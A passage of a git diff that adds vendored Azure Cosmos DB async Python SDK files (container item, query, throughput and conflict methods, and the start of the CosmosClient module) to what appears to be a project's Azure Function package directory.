u"{}/docs/{}".format(self.container_link, item_or_link) + return item_or_link["_self"] + + def _get_conflict_link(self, conflict_or_link: Union[Dict[str, Any], str]) -> str: + if isinstance(conflict_or_link, str): + return u"{}/conflicts/{}".format(self.container_link, conflict_or_link) + return conflict_or_link["_self"] + + def _set_partition_key(self, partition_key) -> Union[str, Awaitable]: + if partition_key == NonePartitionKeyValue: + return CosmosClientConnection._return_undefined_or_empty_partition_key(self.is_system_key) + return partition_key + + + @distributed_trace_async + async def read( + self, + **kwargs: Any + ) -> Dict[str, Any]: + """Read the container properties. + + :keyword bool populate_partition_key_range_statistics: Enable returning partition key + range statistics in response headers. + :keyword bool populate_quota_info: Enable returning collection storage quota information in response headers. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Raised if the container couldn't be retrieved. + This includes if the container does not exist. + :returns: Dict representing the retrieved container. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + populate_partition_key_range_statistics = kwargs.pop('populate_partition_key_range_statistics', None) + if populate_partition_key_range_statistics is not None: + request_options["populatePartitionKeyRangeStatistics"] = populate_partition_key_range_statistics + populate_quota_info = kwargs.pop('populate_quota_info', None) + if populate_quota_info is not None: + request_options["populateQuotaInfo"] = populate_quota_info + + collection_link = self.container_link + self._properties = await self.client_connection.ReadContainer( + collection_link, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, self._properties) + + return cast('Dict[str, Any]', self._properties) + + @distributed_trace_async + async def create_item( + self, + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Create an item in the container. + + To update or replace an existing item, use the + :func:`ContainerProxy.upsert_item` method. + + :param dict[str, str] body: A dict-like object representing the item to create. + :keyword str pre_trigger_include: trigger id to be used as pre operation trigger. + :keyword str post_trigger_include: trigger id to be used as post operation trigger. + :keyword indexing_directive: Enumerates the possible values to indicate whether the document should + be omitted from indexing. Possible values include: 0 for Default, 1 for Exclude, or 2 for Include. + :paramtype indexing_directive: Union[int, ~azure.cosmos.documents.IndexingDirective] + :keyword bool enable_automatic_id_generation: Enable automatic id generation if no id present. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Item with the given ID already exists. + :returns: A dict representing the new item. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + pre_trigger_include = kwargs.pop('pre_trigger_include', None) + post_trigger_include = kwargs.pop('post_trigger_include', None) + indexing_directive = kwargs.pop('indexing_directive', None) + + request_options["disableAutomaticIdGeneration"] = not kwargs.pop('enable_automatic_id_generation', False) + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + if indexing_directive is not None: + request_options["indexingDirective"] = indexing_directive + + result = await self.client_connection.CreateItem( + database_or_container_link=self.container_link, document=body, options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def read_item( + self, + item: Union[str, Dict[str, Any]], + partition_key: Union[str, int, float, bool], + **kwargs: Any + ) -> Dict[str, Any]: + """Get the item identified by `item`. + + :param item: The ID (name) or dict representing item to retrieve. + :type item: Union[str, Dict[str, Any]] + :param partition_key: Partition key for the item to retrieve. + :type partition_key: Union[str, int, float, bool] + :keyword str post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: The max cache staleness for the integrated cache in + milliseconds. For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given item couldn't be retrieved. + :returns: Dict representing the item to be retrieved. + :rtype: Dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START update_item] + :end-before: [END update_item] + :language: python + :dedent: 0 + :caption: Get an item from the database and update one of its properties: + :name: update_item + """ + doc_link = self._get_document_link(item) + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["partitionKey"] = self._set_partition_key(partition_key) + post_trigger_include = kwargs.pop('post_trigger_include', None) + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None) + if max_integrated_cache_staleness_in_ms is not None: + validate_cache_staleness_value(max_integrated_cache_staleness_in_ms) + request_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms + + result = await self.client_connection.ReadItem(document_link=doc_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def read_all_items( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """List all the items in the container. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: The max cache staleness for the integrated cache in + milliseconds. For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :returns: An AsyncItemPaged of items (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None) + if max_integrated_cache_staleness_in_ms: + validate_cache_staleness_value(max_integrated_cache_staleness_in_ms) + feed_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms + + if hasattr(response_hook, "clear"): + response_hook.clear() + + items = self.client_connection.ReadItems( + collection_link=self.container_link, feed_options=feed_options, response_hook=response_hook, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, items) + return items + + @distributed_trace + def query_items( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return all results matching the given `query`. + + You can use any value for the container name in the FROM clause, but + often the container name is used. In the examples below, the container + name is "products," and is aliased as "p" for easier referencing in + the WHERE clause. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. + Each parameter is a dict() with 'name' and 'value' keys. + Ignored if no query is provided. + :paramtype parameters: List[Dict[str, Any]] + :keyword partition_key: Specifies the partition key value for the item. If none is provided, + a cross-partition query will be executed. + :paramtype partition_key: Union[str, int, float, bool] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword bool enable_scan_in_query: Allow scan on the queries which couldn't be served as + indexing was opted out on the requested paths. + :keyword bool populate_query_metrics: Enable returning query metrics in response headers. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: The max cache staleness for the integrated cache in + milliseconds. For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :returns: An AsyncItemPaged of items (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START query_items] + :end-before: [END query_items] + :language: python + :dedent: 0 + :caption: Get all products that have not been discontinued: + :name: query_items + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START query_items_param] + :end-before: [END query_items_param] + :language: python + :dedent: 0 + :caption: Parameterized query to get all products that have been discontinued: + :name: query_items_param + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + populate_query_metrics = kwargs.pop('populate_query_metrics', None) + if populate_query_metrics is not None: + feed_options["populateQueryMetrics"] = populate_query_metrics + enable_scan_in_query = kwargs.pop('enable_scan_in_query', None) + if enable_scan_in_query is not None: + feed_options["enableScanInQuery"] = enable_scan_in_query + partition_key = kwargs.pop('partition_key', None) + if partition_key is not None: + feed_options["partitionKey"] = self._set_partition_key(partition_key) + else: + feed_options["enableCrossPartitionQuery"] = True + max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None) + if max_integrated_cache_staleness_in_ms: + validate_cache_staleness_value(max_integrated_cache_staleness_in_ms) + feed_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms + + if hasattr(response_hook, "clear"): + response_hook.clear() + + parameters = kwargs.pop('parameters', None) + items = self.client_connection.QueryItems( + database_or_container_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + partition_key=partition_key, + response_hook=response_hook, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, items) + return items + + @distributed_trace + def query_items_change_feed( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Get a sorted list of items that were changed, in the order in which they were modified. + + :keyword bool is_start_from_beginning: Get whether change feed should start from + beginning (true) or from current (false). By default it's start from current (false). + :keyword str partition_key_range_id: ChangeFeed requests can be executed against specific partition key + ranges. This is used to process the change feed in parallel across multiple consumers. + :keyword str continuation: e_tag value to be used as continuation for reading change feed. + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword partition_key: partition key at which ChangeFeed requests are targeted. + :paramtype partition_key: Union[str, int, float, bool] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of items (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + partition_key = kwargs.pop("partition_key", None) + partition_key_range_id = kwargs.pop("partition_key_range_id", None) + is_start_from_beginning = kwargs.pop("is_start_from_beginning", False) + feed_options["isStartFromBeginning"] = is_start_from_beginning + if partition_key_range_id is not None: + feed_options["partitionKeyRangeId"] = partition_key_range_id + if partition_key is not None: + feed_options["partitionKey"] = self._set_partition_key(partition_key) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + continuation = kwargs.pop('continuation', None) + if continuation is not None: + feed_options["continuation"] = continuation + + if hasattr(response_hook, "clear"): + response_hook.clear() + + result = self.client_connection.QueryItemsChangeFeed( + self.container_link, options=feed_options, response_hook=response_hook, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def upsert_item( + self, + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Insert or update the specified item. + + If the item already exists in the container, it is replaced. If the item + does not already exist, it is inserted. + + :param Dict[str, Any] body: A dict-like object representing the item to update or insert. + :keyword str pre_trigger_include: trigger id to be used as pre operation trigger. + :keyword str post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given item could not be upserted. + :returns: A dict representing the upserted item. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["disableAutomaticIdGeneration"] = True + pre_trigger_include = kwargs.pop('pre_trigger_include', None) + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + post_trigger_include = kwargs.pop('post_trigger_include', None) + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + + result = await self.client_connection.UpsertItem( + database_or_container_link=self.container_link, + document=body, + options=request_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def replace_item( + self, + item: Union[str, Dict[str, Any]], + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Replaces the specified item if it exists in the container. + + If the item does not already exist in the container, an exception is raised. + + :param item: The ID (name) or dict representing item to be replaced. + :type item: Union[str, Dict[str, Any]] + :param Dict[str, Any] body: A dict-like object representing the item to replace. + :keyword str pre_trigger_include: trigger id to be used as pre operation trigger. + :keyword str post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The replace failed or the item with + given id does not exist. + :returns: A dict representing the item after replace went through. + :rtype: Dict[str, Any] + """ + item_link = self._get_document_link(item) + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["disableAutomaticIdGeneration"] = True + pre_trigger_include = kwargs.pop('pre_trigger_include', None) + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + post_trigger_include = kwargs.pop('post_trigger_include', None) + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + + result = await self.client_connection.ReplaceItem( + document_link=item_link, new_document=body, options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def delete_item( + self, + item: Union[str, Dict[str, Any]], + partition_key: Union[str, int, float, bool], + **kwargs: Any + ) -> None: + """Delete the specified item from the container. + + If the item does not already exist in the container, an exception is raised. + + :param item: The ID (name) or dict representing item to be deleted. + :type item: Union[str, Dict[str, Any]] + :param partition_key: Specifies the partition key value for the item. + :type partition_key: Union[str, int, float, bool] + :keyword str pre_trigger_include: trigger id to be used as pre operation trigger. + :keyword str post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], None], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The item wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The item does not exist in the container. + :rtype: None + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["partitionKey"] = self._set_partition_key(partition_key) + pre_trigger_include = kwargs.pop('pre_trigger_include', None) + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + post_trigger_include = kwargs.pop('post_trigger_include', None) + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + + document_link = self._get_document_link(item) + result = await self.client_connection.DeleteItem(document_link=document_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + @distributed_trace_async + async def get_throughput(self, **kwargs: Any) -> ThroughputProperties: + """Get the ThroughputProperties object for this container. + + If no ThroughputProperties already exists for the container, an exception is raised. + + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], List[Dict[str, Any]]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the container + or the throughput properties could not be retrieved. + :returns: ThroughputProperties for the container. + :rtype: ~azure.cosmos.offer.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = await self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = [throughput async for throughput in + self.client_connection.QueryOffers(query_spec, **kwargs)] + if len(throughput_properties) == 0: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find ThroughputProperties for container " + self.container_link) + + if response_hook: + response_hook(self.client_connection.last_response_headers, throughput_properties) + + return ThroughputProperties(offer_throughput=throughput_properties[0]["content"]["offerThroughput"], + properties=throughput_properties[0]) + + @distributed_trace_async + async def replace_throughput(self, throughput: int, **kwargs: Any) -> ThroughputProperties: + """Replace the container's throughput. + + If no ThroughputProperties already exist for the container, an exception is raised. + + :param int throughput: The throughput to be set (an integer). + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the container + or the throughput properties could not be updated. + :returns: ThroughputProperties for the container, updated with new throughput. + :rtype: ~azure.cosmos.offer.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = await self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = [throughput async for throughput in + self.client_connection.QueryOffers(query_spec, **kwargs)] + if len(throughput_properties) == 0: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find Offer for container " + self.container_link) + + new_offer = throughput_properties[0].copy() + new_offer["content"]["offerThroughput"] = throughput + data = await self.client_connection.ReplaceOffer(offer_link=throughput_properties[0]["_self"], + offer=throughput_properties[0], **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, data) + + return ThroughputProperties(offer_throughput=data["content"]["offerThroughput"], properties=data) + + @distributed_trace + def list_conflicts(self, **kwargs: Any) -> AsyncItemPaged[Dict[str, Any]]: + """List all the conflicts in the container. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of conflicts (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadConflicts( + collection_link=self.container_link, feed_options=feed_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def query_conflicts( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return all conflicts matching a given `query`. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. Ignored if no query is provided. + :paramtype parameters: List[Dict[str, Any]] + :keyword partition_key: Specifies the partition key value for the item. If none is passed in, a + cross partition query will be executed. + :paramtype partition_key: Union[str, int, float, bool] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of conflicts (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + partition_key = kwargs.pop("partition_key", None) + if partition_key is not None: + feed_options["partitionKey"] = self._set_partition_key(partition_key) + else: + feed_options["enableCrossPartitionQuery"] = True + + parameters = kwargs.pop('parameters', None) + result = self.client_connection.QueryConflicts( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def get_conflict( + self, + conflict: Union[str, Dict[str, Any]], + partition_key: Union[str, int, float, bool], + **kwargs: Any, + ) -> Dict[str, Any]: + """Get the conflict identified by `conflict`. + + :param conflict: The ID (name) or dict representing the conflict to retrieve. + :type conflict: Union[str, Dict[str, Any]] + :param partition_key: Partition key for the conflict to retrieve. + :type partition_key: Union[str, int, float, bool] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given conflict couldn't be retrieved. + :returns: A dict representing the retrieved conflict. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["partitionKey"] = self._set_partition_key(partition_key) + result = await self.client_connection.ReadConflict( + conflict_link=self._get_conflict_link(conflict), options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def delete_conflict( + self, + conflict: Union[str, Dict[str, Any]], + partition_key: Union[str, int, float, bool], + **kwargs: Any, + ) -> None: + """Delete a specified conflict from the container. + + If the conflict does not already exist in the container, an exception is raised. + + :param conflict: The ID (name) or dict representing the conflict to retrieve. + :type conflict: Union[str, Dict[str, Any]] + :param partition_key: Partition key for the conflict to retrieve. + :type partition_key: Union[str, int, float, bool] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], None], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The conflict wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The conflict does not exist in the container. + :rtype: None + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["partitionKey"] = self._set_partition_key(partition_key) + result = await self.client_connection.DeleteConflict( + conflict_link=self._get_conflict_link(conflict), options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client.py new file mode 100644 index 0000000..28f65ab --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client.py @@ -0,0 +1,396 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create, read, and delete databases in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, Dict, Optional, Union, cast +from azure.core.async_paging import AsyncItemPaged +from azure.core.credentials import TokenCredential + +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.tracing.decorator import distributed_trace + +from ..cosmos_client import _parse_connection_str, _build_auth +from ._cosmos_client_connection_async import CosmosClientConnection +from .._base import build_options as _build_options +from ._retry_utility_async import _ConnectionRetryPolicy +from ._database import DatabaseProxy +from ..documents import ConnectionPolicy, DatabaseAccount +from ..exceptions import CosmosResourceNotFoundError + +__all__ = ("CosmosClient",) + + +def _build_connection_policy(kwargs: Dict[str, Any]) -> ConnectionPolicy: + # pylint: disable=protected-access + policy = kwargs.pop('connection_policy', None) or ConnectionPolicy() + + # Connection config + policy.RequestTimeout = kwargs.pop('request_timeout', None) or \ + kwargs.pop('connection_timeout', None) or \ + policy.RequestTimeout + policy.ConnectionMode = kwargs.pop('connection_mode', None) or policy.ConnectionMode + policy.ProxyConfiguration = kwargs.pop('proxy_config', None) or policy.ProxyConfiguration + policy.EnableEndpointDiscovery = kwargs.pop('enable_endpoint_discovery', None) or policy.EnableEndpointDiscovery + policy.PreferredLocations = kwargs.pop('preferred_locations', None) or policy.PreferredLocations + policy.UseMultipleWriteLocations = kwargs.pop('multiple_write_locations', None) or \ + policy.UseMultipleWriteLocations + + # SSL config + verify = kwargs.pop('connection_verify', None) + policy.DisableSSLVerification = not bool(verify if verify is not None else True) + ssl = kwargs.pop('ssl_config', None) or policy.SSLConfiguration + if ssl: + ssl.SSLCertFile = kwargs.pop('connection_cert', None) or ssl.SSLCertFile + ssl.SSLCaCerts = verify or ssl.SSLCaCerts + policy.SSLConfiguration = ssl + + # Retry config + retry_options = policy.RetryOptions + total_retries = kwargs.pop('retry_total', None) + retry_options._max_retry_attempt_count = total_retries or retry_options._max_retry_attempt_count + retry_options._fixed_retry_interval_in_milliseconds = kwargs.pop('retry_fixed_interval', None) or \ + retry_options._fixed_retry_interval_in_milliseconds + max_backoff = kwargs.pop('retry_backoff_max', None) + retry_options._max_wait_time_in_seconds = max_backoff or retry_options._max_wait_time_in_seconds + policy.RetryOptions = retry_options + connection_retry = policy.ConnectionRetryConfiguration + if not connection_retry: + connection_retry = _ConnectionRetryPolicy( + retry_total=total_retries, + retry_connect=kwargs.pop('retry_connect', None), + retry_read=kwargs.pop('retry_read', None), + retry_status=kwargs.pop('retry_status', None), + retry_backoff_max=max_backoff, + retry_on_status_codes=kwargs.pop('retry_on_status_codes', []), + retry_backoff_factor=kwargs.pop('retry_backoff_factor', 0.8), + ) + policy.ConnectionRetryConfiguration = connection_retry + + return policy + + +class CosmosClient(object): # pylint: disable=client-accepts-api-version-keyword + """A client-side logical representation of an Azure Cosmos DB account. + + Use this client to configure and execute requests to the Azure Cosmos DB service. + + :param str url: The URL of the Cosmos DB account. + :param credential: Can be the account key, or a dictionary of resource tokens. + :type credential: Union[str, Dict[str, str], ~azure.core.credentials_async.AsyncTokenCredential] + :keyword str consistency_level: Consistency level to use for the session. Default value is None (account-level). + More on consistency levels and possible values: https://aka.ms/cosmos-consistency-levels + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START create_client] + :end-before: [END create_client] + :language: python + :dedent: 0 + :caption: Create a new instance of the Cosmos DB client: + :name: create_client + """ + + def __init__( + self, + url: str, + credential: Union[str, Dict[str, str], TokenCredential], + *, + consistency_level: Optional[str] = None, + **kwargs: Any + ) -> None: + """Instantiate a new CosmosClient.""" + auth = _build_auth(credential) + connection_policy = _build_connection_policy(kwargs) + self.client_connection = CosmosClientConnection( + url, + auth=auth, + consistency_level=consistency_level, + connection_policy=connection_policy, + **kwargs + ) + + def __repr__(self) -> str: + return "".format(self.client_connection.url_connection)[:1024] + + async def __aenter__(self): + await self.client_connection.pipeline_client.__aenter__() + await self.client_connection._setup() + return self + + async def __aexit__(self, *args): + return await self.client_connection.pipeline_client.__aexit__(*args) + + async def close(self) -> None: + """Close this instance of CosmosClient.""" + await self.__aexit__() + + @classmethod + def from_connection_string( + cls, + conn_str: str, + *, + credential: Optional[Union[str, Dict[str, str]]] = None, + consistency_level: Optional[str] = None, + **kwargs: Any + ) -> "CosmosClient": + """Create a CosmosClient instance from a connection string. + + This can be retrieved from the Azure portal.For full list of optional + keyword arguments, see the CosmosClient constructor. + + :param str conn_str: The connection string. + :keyword credential: Alternative credentials to use instead of the key provided in the connection string. + :paramtype credential: Union[str, Dict[str, str]] + :keyword str consistency_level: Consistency level to use for the session. Default value is None (account-level). + More on consistency levels and possible values: https://aka.ms/cosmos-consistency-levels + :returns: a CosmosClient instance + :rtype: ~azure.cosmos.aio.CosmosClient + """ + settings = _parse_connection_str(conn_str, credential) + return cls( + url=settings['AccountEndpoint'], + credential=settings['AccountKey'], + consistency_level=consistency_level, + **kwargs + ) + + @staticmethod + def _get_database_link(database_or_id: Union[DatabaseProxy, str, Dict[str, str]]) -> str: + if isinstance(database_or_id, 